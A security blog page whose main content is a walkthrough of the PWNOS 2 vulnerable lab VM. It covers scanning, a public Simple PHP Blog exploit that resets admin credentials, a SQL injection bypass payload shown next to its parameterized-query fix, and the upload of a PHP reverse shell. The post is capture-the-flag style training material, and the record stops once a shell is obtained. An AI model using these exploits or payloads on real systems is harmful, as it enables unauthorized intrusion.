Def Security Jam: Cyber Security, Compliance, Security News, Vulnerabilities, Exploits, Tools & Experiences<br />
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITIL (http://www.blogger.com/profile/12137980462590589771)<br />
<br />
John McAfee - How to Uninstall McAfee Antivirus (published 2015-07-24T11:13:00.000-04:00, updated 2015-07-24T11:18:41.185-04:00)<div dir="ltr" style="text-align: left;" trbidi="on">
This may be a bit dated, but I find it totally hilarious and had to share it with those who haven't seen it yet. John definitely embodies the strategy of getting in the game and cashing out. I wonder whatever happened with that murder investigation. Watching this video makes it clear why Intel had no problem shedding the "McAfee" brand for "Intel Security".... Anyway, enjoy!<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/bKgf5PaBzyg" width="560"></iframe><br />
<br />
Til next time,<br />
Court</div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITIL<br />
<br />
PWNOS Version 2 Walkthrough (published 2015-07-11T19:45:00.003-04:00, updated 2015-07-11T19:45:47.793-04:00)<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<br /></div>
<div>
<br /></div>
<div>
Needing to keep the old knife sharp, I decided to try my luck at the <a href="http://www.pwnos.com/" target="_blank">PWNOS 2</a> vulnerable virtual machine. After setting up the VM in VirtualBox, I configured a NAT Network with the range 10.10.10.0/24, which placed my machine on the same subnet as the static IP of 10.10.10.100 assigned to the image. </div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitz8VuSFitzYq648klZthFodJjhD6bRCuz9Ncc22-PYqxibKhWQ_mIWfSOv1Q32aE-tIcAROO8RXvta9BXQQF35iNK5l-Ip7mvhjRtbXCLkpFtScMXjZ9nA-wGD82Cs0Ziqp4bgWyb9VZQ/s1600/Screenshot+from+2015-07-05+11%253A23%253A42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitz8VuSFitzYq648klZthFodJjhD6bRCuz9Ncc22-PYqxibKhWQ_mIWfSOv1Q32aE-tIcAROO8RXvta9BXQQF35iNK5l-Ip7mvhjRtbXCLkpFtScMXjZ9nA-wGD82Cs0Ziqp4bgWyb9VZQ/s400/Screenshot+from+2015-07-05+11%253A23%253A42.png" width="400" /></a></div>
<div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">
<pre>
root@kali:~# nmap 10.10.10.100

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-04 22:44 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:6C:04:53 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
root@kali:~# nmap -A 10.10.10.100

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-04 22:45 EDT
Nmap scan report for 10.10.10.100
Host is up (0.00052s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85:d3:2b:01:09:42:7b:20:4e:30:03:6d:d1:8f:95:ff (DSA)
|   2048 30:7a:31:9a:1b:b8:17:e7:15:df:89:92:0e:cd:58:28 (RSA)
|_  256 10:12:64:4b:7d:ff:6a:87:37:26:38:b1:44:9f:cf:5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Welcome to this Site!
MAC Address: 08:00:27:6C:04:53 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
root@kali:~#
</pre>
<br />
</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
The default webpage on port 80 seemed to be an Intranet web site</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuICakx5Sg6zdXyySC6RFcXJQ7FCzMJA70M0vF3hFH3tN1xA7yAaJ-GzUcveESyGhBd8YbwXHZ5QuJ0X8k6etiO2wa3P5KP9Iiuh3-527_pGnSA_YKJHKBcPQxY3ImjstLt7_83gHzH_DM/s1600/Screenshot+from+2015-07-11+13%253A33%253A35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuICakx5Sg6zdXyySC6RFcXJQ7FCzMJA70M0vF3hFH3tN1xA7yAaJ-GzUcveESyGhBd8YbwXHZ5QuJ0X8k6etiO2wa3P5KP9Iiuh3-527_pGnSA_YKJHKBcPQxY3ImjstLt7_83gHzH_DM/s400/Screenshot+from+2015-07-11+13%253A33%253A35.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I decided to run my usual set of web server enumeration tools against the box.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">
<pre>
root@kali:~# nikto -h http://10.10.10.100
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.100
+ Target Hostname:    10.10.10.100
+ Target Port:        80
+ Start Time:         2015-07-04 22:47:08 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.3.5-1ubuntu7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /info/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /register/: This might be interesting...
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 1311031, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /login.php: Admin login page/section found.
+ 7331 requests: 0 error(s) and 22 item(s) reported on remote host
+ End Time:           2015-07-04 22:47:25 (GMT-4) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# 


root@kali:~# dirb http://10.10.10.100 /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.21    
By The Dark Raver
-----------------

START_TIME: Sat Jul  4 22:48:59 2015
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50171)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/colors (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5921)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8093)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5670)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4954)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5312)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upload_img (CODE:302|SIZE:0)

---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
DOWNLOADED: 40916 - FOUND: 28
root@kali:~#
</pre>
<br />
</td>
</tr>
</tbody></table>
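Nikto's MultiViews finding above is worth understanding, because it is what turned the extension-less /index into the real file name index.php. Here is an added example in Python (mine, not part of the original post or of Nikto): it builds the probe request, then parses the 406 response Apache mod_negotiation returns when no variant satisfies the Accept header, pulling the candidate file names out of the RFC 2295 Alternates header. The 406 response it parses is constructed for the example; the file names and lengths in it are illustrative, not captured from 10.10.10.100.

```python
"""MultiViews file-name disclosure: build the probe, parse the Alternates header.

Added example, not code from the walkthrough or from Nikto.
"""
import re
from typing import Dict, List, Tuple

# Constructed sample of a MultiViews 406; names and lengths are illustrative,
# not captured from 10.10.10.100.
SAMPLE_406 = (
    "HTTP/1.1 406 Not Acceptable\r\n"
    "Date: Sat, 04 Jul 2015 22:47:10 GMT\r\n"
    "Server: Apache/2.2.17 (Ubuntu)\r\n"
    'Alternates: {"index.php" 1 {type application/x-httpd-php} {length 854}}, '
    '{"index.php.bak" 1 {type application/x-trash} {length 912}}\r\n'
    "Vary: negotiate,accept\r\n"
    "TCN: list\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "\r\n"
    "Not Acceptable: available variants index.php, index.php.bak"
)

# One RFC 2295 variant description: {"name" qvalue {attr value} {attr value} ...}
_VARIANT = re.compile(r'\{"(?P<name>[^"]+)"\s+(?P<q>[0-9.]+)\s*(?P<attrs>(?:\{[^}]*\}\s*)*)\}')
_ATTR = re.compile(r"\{(\w+)\s+([^}]*)\}")


def probe_request(host: str, path: str) -> str:
    """Request that triggers the leak: an extension-less path plus an Accept no file can satisfy."""
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            "Accept: bogus/nonexistent\r\nConnection: close\r\n\r\n")


def parse_headers(raw: str) -> Tuple[str, Dict[str, str]]:
    """(status line, lower-cased header dict) from a raw HTTP response; the body is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return lines[0], headers


def parse_alternates(value: str) -> List[Tuple[str, Dict[str, str]]]:
    """[(file_name, {attr: value}), ...] parsed from an Alternates header value."""
    out = []
    for m in _VARIANT.finditer(value):
        attrs = {k: v.strip() for k, v in _ATTR.findall(m.group("attrs"))}
        out.append((m.group("name"), attrs))
    return out


def multiviews_leak(raw: str) -> List[str]:
    """File names disclosed by a 300/406 negotiation response; [] when nothing leaks."""
    status, headers = parse_headers(raw)
    parts = status.split()
    if len(parts) < 2 or parts[1] not in ("300", "406") or "alternates" not in headers:
        return []
    return [name for name, _ in parse_alternates(headers["alternates"])]


if __name__ == "__main__":
    print(probe_request("10.10.10.100", "/index"))
    print("leaked:", multiviews_leak(SAMPLE_406))
```

Against a live target you would pipe `probe_request(...)` into `nc host 80` (or any HTTP client that lets you set Accept) and feed the raw reply to `multiviews_leak`; walk the dirb hits such as /info, /login and /register the same way. On the server side the fix is `Options -MultiViews` for the document root.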
<div class="separator" style="clear: both; text-align: left;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both;">
The nikto and dirb scans also turned up a login.php page, which seemed to be prone to SQL injection but was definitely filtering some of the more basic payloads. </div>
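Since the login page looked injectable but filtered the basic payloads, here is an added example (not PWNOS's login.php, whose source the post never shows) of why that kind of filtering is not a defence. `login_blacklist` models a hypothetical blacklist in front of string-concatenated SQL; `login_parameterized` is the fix. The user table is an in-memory SQLite stand-in for the ch16.users table dumped later in the post, with a made-up password, and hashing with SHA-1 is an assumption based on the 40-hex value in the pass column.

```python
"""Blacklist filtering vs. parameterized queries on a login form.

Added example, not code from the PWNOS box. Names, table and password are
constructed for the demonstration.
"""
import hashlib
import re
import sqlite3
from typing import Optional, Tuple

# Constructed password; the real admin password is unknown (the dump only shows its hash).
SAMPLE_PASSWORD = "not-the-real-password"
TEXTBOOK_PAYLOAD = "' OR '1'='1"                          # what a naive filter catches
BYPASS_PAYLOAD = "admin@isints.com' OR 1=1 OR 'x'='y"      # same logic, different spelling


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for ch16.users; SHA-1 for the pass column is an assumption."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, email TEXT, pass TEXT, user_level INTEGER)")
    db.execute("INSERT INTO users VALUES (1, 'admin@isints.com', ?, 0)",
               (hashlib.sha1(SAMPLE_PASSWORD.encode()).hexdigest(),))
    db.commit()
    return db


# Hypothetical blacklist: rejects the "basic exploits" and nothing else.
_BLACKLIST = re.compile(r"(' OR '1'='1|--|;|UNION\s+SELECT)", re.IGNORECASE)


def login_blacklist(db: sqlite3.Connection, email: str, password: str) -> Optional[Tuple[int]]:
    """Vulnerable: rejects a few known strings, then concatenates the rest into SQL."""
    if _BLACKLIST.search(email) or _BLACKLIST.search(password):
        return None  # "filtered": the behaviour the box showed for textbook payloads
    h = hashlib.sha1(password.encode()).hexdigest()
    sql = f"SELECT user_id FROM users WHERE email='{email}' AND pass='{h}'"
    # With BYPASS_PAYLOAD this becomes ... email='admin@isints.com' OR 1=1 OR 'x'='y' AND pass='...'
    # and AND binds tighter than OR, so the row comes back regardless of the password.
    return db.execute(sql).fetchone()


def login_parameterized(db: sqlite3.Connection, email: str, password: str) -> Optional[Tuple[int]]:
    """Fixed: bound parameters, so attacker input can never become SQL syntax."""
    h = hashlib.sha1(password.encode()).hexdigest()
    return db.execute("SELECT user_id FROM users WHERE email=? AND pass=?", (email, h)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("textbook payload, blacklist: ", login_blacklist(db, TEXTBOOK_PAYLOAD, "x"))
    print("bypass payload, blacklist:   ", login_blacklist(db, BYPASS_PAYLOAD, "x"))
    print("bypass payload, parameterized:", login_parameterized(db, BYPASS_PAYLOAD, "x"))
```

The blacklist stops the payload everyone tries first and nothing else; spelling the same tautology without the quoted `'1'` walks straight past it. MySQL, which the box runs, has the same AND-over-OR precedence as SQLite, so the bypass reads the same there; only the bound parameters close the hole.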
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUbfEDIMpWPn760HH0rFlIs6bPSRE1xpJUMayeY7cghIL1xeZ3XiAQXGtl1Li96dNbqpWMKOpQRRHKFDBbOFTeRa7mK7zsPprf23Hc5n8H1D9UPCyIWzFo-iKSxK6Mtx2h8r1CuctUhQQ8/s1600/Screenshot+from+2015-07-04+23%253A40%253A08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUbfEDIMpWPn760HH0rFlIs6bPSRE1xpJUMayeY7cghIL1xeZ3XiAQXGtl1Li96dNbqpWMKOpQRRHKFDBbOFTeRa7mK7zsPprf23Hc5n8H1D9UPCyIWzFo-iKSxK6Mtx2h8r1CuctUhQQ8/s400/Screenshot+from+2015-07-04+23%253A40%253A08.png" width="400" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
I decided to take a closer look at the source of the /blog page and found that the underlying app was Simple PHP Blog 0.4.0.</div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYs4N6JoKzRi6oK0Q0ZjB-BC9rDHH3DS8u6lhPQSFe_vhpTfOs-IxaOLYTvpKi0axHbZ4zr_Lu-lbiTGeDX1YqdSu3m34rJwNR2rITHsUl59lQAcbZFOHTHJ3721yNrdNBbg45rFR-gGrr/s1600/Screenshot+from+2015-07-05+00%253A13%253A29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYs4N6JoKzRi6oK0Q0ZjB-BC9rDHH3DS8u6lhPQSFe_vhpTfOs-IxaOLYTvpKi0axHbZ4zr_Lu-lbiTGeDX1YqdSu3m34rJwNR2rITHsUl59lQAcbZFOHTHJ3721yNrdNBbg45rFR-gGrr/s400/Screenshot+from+2015-07-05+00%253A13%253A29.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Let's see if we can find any vulnerabilities or exploits associated with Simple PHP Blog 0.4.0.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiISJ8a4sj4Ncuo7rzAnFzEUirz09zT2Luggsz3cRzLh5_A8gjutuBTfOfBL78TywE0fCArScSb-euCxH_ZW2UzqUtDoeRmoNrjnkHdwyDwRy3K8MoxjIg0DnV59EuSB0WO1Vnqp65d-3VU/s1600/Screenshot+from+2015-07-05+00%253A08%253A30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiISJ8a4sj4Ncuo7rzAnFzEUirz09zT2Luggsz3cRzLh5_A8gjutuBTfOfBL78TywE0fCArScSb-euCxH_ZW2UzqUtDoeRmoNrjnkHdwyDwRy3K8MoxjIg0DnV59EuSB0WO1Vnqp65d-3VU/s400/Screenshot+from+2015-07-05+00%253A08%253A30.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Exploit-DB had a couple of exploits that fit the bill: a Metasploit module as well as the Perl-based exploit (1191.pl) that I decided to go with.
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGb7ppuk3zin5S3YAjsiIoIHNymBE5d_DRroDtDAKn4HutC_T9q8w5MKdNgHBDH_DOAvyiVa-KxUanyecrefsWIe13k3HnsnGisakYnbCIf6Z4O1xiQ2k3BLNfBQ5XcQvo8-i86Jejdtqn/s1600/Screenshot+from+2015-07-11+19%253A21%253A22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGb7ppuk3zin5S3YAjsiIoIHNymBE5d_DRroDtDAKn4HutC_T9q8w5MKdNgHBDH_DOAvyiVa-KxUanyecrefsWIe13k3HnsnGisakYnbCIf6Z4O1xiQ2k3BLNfBQ5XcQvo8-i86Jejdtqn/s400/Screenshot+from+2015-07-11+19%253A21%253A22.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">
<pre>
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 2



________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
 by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Username and Password Hash Retrieval Exploit....


Retrieved Username and Password Hash: $1$zsdi5o/7$kJuEkwpL6uEqhrXFDn98y/


*** Exploit Completed....
Have a nice day! :)
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 3





________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
 by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
Use of uninitialized value $user in concatenation (.) or string at 1191.pl line 341.
./config/password.txt created!
Use of uninitialized value $pass in concatenation (.) or string at 1191.pl line 342.
Username is set to: 
Password is set to: 


*** Exploit Completed....
Have a nice day! :)
root@kali:~/pwnos2# perl 1191.pl -h http://10.10.10.100/blog -e 3 -U court -P password




________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
 by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: court
Password is set to: password


*** Exploit Completed....
Have a nice day! :)
root@kali:~/pwnos2# ls
1191.pl  exploit2.php  exploit.php
root@kali:~/pwnos2# cp /var/www/php-reverse-shell.php .
root@kali:~/pwnos2# nano php-reverse-shell.php 
root@kali:~/pwnos2# 
</pre>
<br />
</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
Awesome, the exploit let me set my own admin username and password on the blog application (it deletes and rewrites ./config/password.txt; note that running it without -U and -P writes empty credentials). Hopefully I can now upload a web or reverse shell to the system.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWUj50-5rGenBH3bVi4QwObmjq-yoEAHiJB_6Uw1wdWAlNOalFGbl04iI1C7YNPgVE6RU_8drtW5K5uKttkEFnXiIO0ULcLoS1qcY_TyxxgwH7uWBqClynXf0rklzN8fEUJQoxmIXwLH7p/s1600/Screenshot+from+2015-07-05+00%253A11%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWUj50-5rGenBH3bVi4QwObmjq-yoEAHiJB_6Uw1wdWAlNOalFGbl04iI1C7YNPgVE6RU_8drtW5K5uKttkEFnXiIO0ULcLoS1qcY_TyxxgwH7uWBqClynXf0rklzN8fEUJQoxmIXwLH7p/s400/Screenshot+from+2015-07-05+00%253A11%253A40.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The first place I always check is the Kali Linux distro under /usr/share/webshells/php. I used the old reliable php_reverse_shell.php. After modifying the code to match my IP address and listener port, I successfully uploaded it to the blog site. I was afraid I'd run into filtering that would restrict the file type, but I was lucky this time.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbX9VxOhlbYIY0VwKERTusg3XXzSKlqlTRItzfXD4EYkMirLyKUY1G6WPIZUsAx2RkD1dflwaNFxUGUvq8H1szbtrEpc3x5txh42QiGfx1GW-3T9QCAAx6bytmpYcofNTAAn15dpJoy0B1/s1600/Screenshot+from+2015-07-05+10%253A43%253A06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbX9VxOhlbYIY0VwKERTusg3XXzSKlqlTRItzfXD4EYkMirLyKUY1G6WPIZUsAx2RkD1dflwaNFxUGUvq8H1szbtrEpc3x5txh42QiGfx1GW-3T9QCAAx6bytmpYcofNTAAn15dpJoy0B1/s400/Screenshot+from+2015-07-05+10%253A43%253A06.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I uploaded the shell, started a netcat listener on my system on port 1234 (the port set within my php_reverse_shell.php file), browsed to the malicious page (10.10.10.100/blog/images/php_reverse_shell.php) and boom, I'm in.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
